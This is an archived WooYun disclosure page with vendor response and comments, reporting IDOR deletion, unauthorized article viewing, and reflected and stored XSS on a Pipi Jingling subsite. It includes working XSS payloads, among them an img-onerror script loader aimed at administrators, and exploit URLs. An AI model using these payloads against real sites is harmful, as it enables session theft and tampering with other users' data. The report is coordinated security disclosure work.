当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-027139

漏洞标题:皮皮精灵某分站一些小漏洞打包

相关厂商:皮皮精灵

漏洞作者: 齐迹

提交时间:2013-06-28 20:52

修复时间:2013-08-12 20:53

公开时间:2013-08-12 20:53

漏洞类型:未授权访问/权限绕过

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-06-28: 细节已通知厂商并且等待厂商处理中
2013-06-29: 厂商已经确认,细节仅向厂商公开
2013-07-09: 细节向核心白帽子及相关领域专家公开
2013-07-19: 细节向普通白帽子公开
2013-07-29: 细节向实习白帽子公开
2013-08-12: 细节向公众公开

简要描述:

未授权删除其他用户数据,多处存储反射xss,越权查看其他用户内容。。。

详细说明:

问题站
http://wx.pp.cc
1越权删除其他用户举报
http://wx.pp.cc/wb_ajax/update_action?act=del&id_str=任意ID

wx-yq.jpg


2查看任意文章(不知道是不是本来就公开的,反正未审核的也可以查看)
http://wx.pp.cc/wb_ajax/preview/任意文章ID/1372420599?t=1372403376&preview=1
3 反射xss
http://wx.pp.cc/wb_advs/income?date=&keyword=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
4存储xss2枚
4-1 http://wx.pp.cc/wb_lodge/index
标题,内容,图片url均为过滤可以xss代码打管理

wx-xss-1.jpg


4-2 http://wx.pp.cc/wb_u/write
写文章编辑器过滤不到位
在源码模式下可以使用
<img src=1 onerror="with(document)body.appendChild(createElement('script')).src='xss'">
形成xss攻击 也可以打管理哦!

wx-xss-2.jpg

漏洞证明:

上面已证明,都是小洞 打包给你们了!

修复方案:

程序员都通宵加班修bug把!

版权声明:转载请注明来源 齐迹@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-06-29 10:02

厂商回复:

感谢齐迹的发现,说实话,皮皮微信的负责人之前已经被鞭过一次了。
img 标签上通过 onerror 执行 script 这个确实是我们没想到的,非常感谢。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-06-28 20:53 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    分钟是啥

  2. 2013-06-28 20:54 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)

    @VIP oh shit 分站。。。手误。。。

  3. 2013-06-28 21:38 | 0x2b ( 实习白帽子 | Rank:51 漏洞数:12 )

    看见皮皮精灵 我就再次以圆球的姿态滚来了 不会又将该负责人万鞭打死了吧。

  4. 2013-06-29 00:00 | 小智 ( 实习白帽子 | Rank:33 漏洞数:5 | 低调低调,学习学习~)

    皮皮的分站很多哇-。-貌似我试过一下查看别人定时的微博好像不行。

  5. 2013-06-29 06:54 | 小伟 ( 路人 | Rank:0 漏洞数:2 | )

    别提交了,人家工作人员不知道要被万鞭多少个。

  6. 2013-06-29 07:52 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)

    @小智 我会告诉你。他们有个客户端吗?

  7. 2013-06-29 10:49 | 小智 ( 实习白帽子 | Rank:33 漏洞数:5 | 低调低调,学习学习~)

    @齐迹 我知道-。-不过没用过。。本来我想去测一下客户端。。看来不用了。~

  8. 2013-07-31 14:52 | IXY ( 路人 | Rank:19 漏洞数:3 | 小菜来学习的)

    估计网站负责人每次一看到乌云上有皮皮漏洞 就虎躯一震